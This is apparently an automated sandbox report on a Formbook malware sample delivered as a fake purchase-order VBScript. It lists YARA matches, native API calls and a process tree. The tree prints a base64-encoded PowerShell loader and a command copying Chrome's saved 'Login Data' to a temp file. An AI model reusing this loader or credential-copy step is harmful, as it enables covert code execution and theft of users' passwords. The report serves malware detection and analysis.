Source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0493CCD8 13_2_0493CCD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0493EA58 13_2_0493EA58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0493EA49 13_2_0493EA49
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07D489F8 13_2_07D489F8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB2EF7 19_2_1EAB2EF7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA06E30 19_2_1EA06E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAAD616 19_2_1EAAD616
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB1FF1 19_2_1EAB1FF1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EABDFCE 19_2_1EABDFCE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9F841F 19_2_1E9F841F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAAD466 19_2_1EAAD466
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA12581 19_2_1EA12581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB25DD 19_2_1EAB25DD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9FD5E0 19_2_1E9FD5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB2D07 19_2_1EAB2D07
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9E0D20 19_2_1E9E0D20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB1D55 19_2_1EAB1D55
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB22AE 19_2_1EAB22AE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA1EBB0 19_2_1EA1EBB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA03DA 19_2_1EAA03DA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAADBD2 19_2_1EAADBD2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB2B28 19_2_1EAB2B28
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA120A0 19_2_1EA120A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB20A8 19_2_1EAB20A8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9FB090 19_2_1E9FB090
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB28EC 19_2_1EAB28EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EABE824 19_2_1EABE824
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1002 19_2_1EAA1002
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA04120 19_2_1EA04120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9EF900 19_2_1E9EF900
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F2B28 22_2_032F2B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325EBB0 22_2_0325EBB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EDBD2 22_2_032EDBD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F22AE 22_2_032F22AE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03244120 22_2_03244120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322F900 22_2_0322F900
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032E1002 22_2_032E1002
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032520A0 22_2_032520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F20A8 22_2_032F20A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323B090 22_2_0323B090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F28EC 22_2_032F28EC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F1FF1 22_2_032F1FF1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03246E30 22_2_03246E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032ED616 22_2_032ED616
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F2EF7 22_2_032F2EF7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03220D20 22_2_03220D20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F2D07 22_2_032F2D07
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F1D55 22_2_032F1D55
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03252581 22_2_03252581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323D5E0 22_2_0323D5E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F25DD 22_2_032F25DD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323841F 22_2_0323841F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032ED466 22_2_032ED466
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006C2D88 22_2_006C2D88
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006C2D90 22_2_006C2D90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006C9E60 22_2_006C9E60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006C9E5B 22_2_006C9E5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DE61F 22_2_006DE61F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006C2FB0 22_2_006C2FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0322B150 appears 35 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 1E9EB150 appears 45 times
Contains functionality to call native functions
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA296E0 NtFreeVirtualMemory,LdrInitializeThunk, 19_2_1EA296E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29660 NtAllocateVirtualMemory,LdrInitializeThunk, 19_2_1EA29660
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA297A0 NtUnmapViewOfSection,LdrInitializeThunk, 19_2_1EA297A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29780 NtMapViewOfSection,LdrInitializeThunk, 19_2_1EA29780
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29710 NtQueryInformationToken,LdrInitializeThunk, 19_2_1EA29710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29540 NtReadFile,LdrInitializeThunk, 19_2_1EA29540
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29A20 NtResumeThread,LdrInitializeThunk, 19_2_1EA29A20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29A00 NtProtectVirtualMemory,LdrInitializeThunk, 19_2_1EA29A00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29A50 NtCreateFile,LdrInitializeThunk, 19_2_1EA29A50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA298F0 NtReadVirtualMemory,LdrInitializeThunk, 19_2_1EA298F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29860 NtQuerySystemInformation,LdrInitializeThunk, 19_2_1EA29860
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29840 NtDelayExecution,LdrInitializeThunk, 19_2_1EA29840
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA299A0 NtCreateSection,LdrInitializeThunk, 19_2_1EA299A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29910 NtAdjustPrivilegesToken,LdrInitializeThunk, 19_2_1EA29910
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA296D0 NtCreateKey, 19_2_1EA296D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29610 NtEnumerateValueKey, 19_2_1EA29610
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29670 NtQueryInformationProcess, 19_2_1EA29670
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29650 NtQueryValueKey, 19_2_1EA29650
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29FE0 NtCreateMutant, 19_2_1EA29FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29730 NtQueryVirtualMemory, 19_2_1EA29730
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA2A710 NtOpenProcessToken, 19_2_1EA2A710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29760 NtOpenProcess, 19_2_1EA29760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA2A770 NtOpenThread, 19_2_1EA2A770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29770 NtSetInformationFile, 19_2_1EA29770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA295F0 NtQueryInformationFile, 19_2_1EA295F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA295D0 NtClose, 19_2_1EA295D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29520 NtWaitForSingleObject, 19_2_1EA29520
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA2AD30 NtSetContextThread, 19_2_1EA2AD30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29560 NtWriteFile, 19_2_1EA29560
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29A80 NtOpenDirectoryObject, 19_2_1EA29A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29A10 NtQuerySection, 19_2_1EA29A10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA2A3B0 NtGetContextThread, 19_2_1EA2A3B0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29B00 NtSetValueKey, 19_2_1EA29B00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA298A0 NtWriteVirtualMemory, 19_2_1EA298A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29820 NtEnumerateKey, 19_2_1EA29820
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA2B040 NtSuspendThread, 19_2_1EA2B040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA299D0 NtCreateProcessEx, 19_2_1EA299D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29950 NtQueueApcThread, 19_2_1EA29950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269B00 NtSetValueKey,LdrInitializeThunk, 22_2_03269B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269A50 NtCreateFile,LdrInitializeThunk, 22_2_03269A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269910 NtAdjustPrivilegesToken,LdrInitializeThunk, 22_2_03269910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032699A0 NtCreateSection,LdrInitializeThunk, 22_2_032699A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269860 NtQuerySystemInformation,LdrInitializeThunk, 22_2_03269860
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269840 NtDelayExecution,LdrInitializeThunk, 22_2_03269840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269710 NtQueryInformationToken,LdrInitializeThunk, 22_2_03269710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269770 NtSetInformationFile,LdrInitializeThunk, 22_2_03269770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269780 NtMapViewOfSection,LdrInitializeThunk, 22_2_03269780
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269FE0 NtCreateMutant,LdrInitializeThunk, 22_2_03269FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269610 NtEnumerateValueKey,LdrInitializeThunk, 22_2_03269610
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269660 NtAllocateVirtualMemory,LdrInitializeThunk, 22_2_03269660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269650 NtQueryValueKey,LdrInitializeThunk, 22_2_03269650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032696E0 NtFreeVirtualMemory,LdrInitializeThunk, 22_2_032696E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032696D0 NtCreateKey,LdrInitializeThunk, 22_2_032696D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269560 NtWriteFile,LdrInitializeThunk, 22_2_03269560
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269540 NtReadFile,LdrInitializeThunk, 22_2_03269540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032695D0 NtClose,LdrInitializeThunk, 22_2_032695D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0326A3B0 NtGetContextThread, 22_2_0326A3B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269A20 NtResumeThread, 22_2_03269A20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269A00 NtProtectVirtualMemory, 22_2_03269A00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269A10 NtQuerySection, 22_2_03269A10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269A80 NtOpenDirectoryObject, 22_2_03269A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269950 NtQueueApcThread, 22_2_03269950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032699D0 NtCreateProcessEx, 22_2_032699D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269820 NtEnumerateKey, 22_2_03269820
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0326B040 NtSuspendThread, 22_2_0326B040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032698A0 NtWriteVirtualMemory, 22_2_032698A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032698F0 NtReadVirtualMemory, 22_2_032698F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269730 NtQueryVirtualMemory, 22_2_03269730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0326A710 NtOpenProcessToken, 22_2_0326A710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269760 NtOpenProcess, 22_2_03269760
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0326A770 NtOpenThread, 22_2_0326A770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032697A0 NtUnmapViewOfSection, 22_2_032697A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269670 NtQueryInformationProcess, 22_2_03269670
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269520 NtWaitForSingleObject, 22_2_03269520
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0326AD30 NtSetContextThread, 22_2_0326AD30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032695F0 NtQueryInformationFile, 22_2_032695F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DA360 NtCreateFile, 22_2_006DA360
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DA410 NtReadFile, 22_2_006DA410
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DA490 NtClose, 22_2_006DA490
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DA540 NtAllocateVirtualMemory, 22_2_006DA540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DA35D NtCreateFile, 22_2_006DA35D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DA48A NtClose, 22_2_006DA48A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DA53A NtAllocateVirtualMemory, 22_2_006DA53A
Java / VBScript file with very long strings (likely obfuscated code)
Source: New _Inquiry P.O4622.vbs Initial sample: Strings found which are bigger than 50
Source: New _Inquiry P.O4622.vbs Virustotal: Detection: 8%
Source: New _Inquiry P.O4622.vbs ReversingLabs: Detection: 13%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\New _Inquiry P.O4622.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAI
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6913.tmp" "c:\Users\user\AppData\Local\Temp\vsdke30k\CSC2B92EBAA3FFD4AC6819286896BCEF79.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0A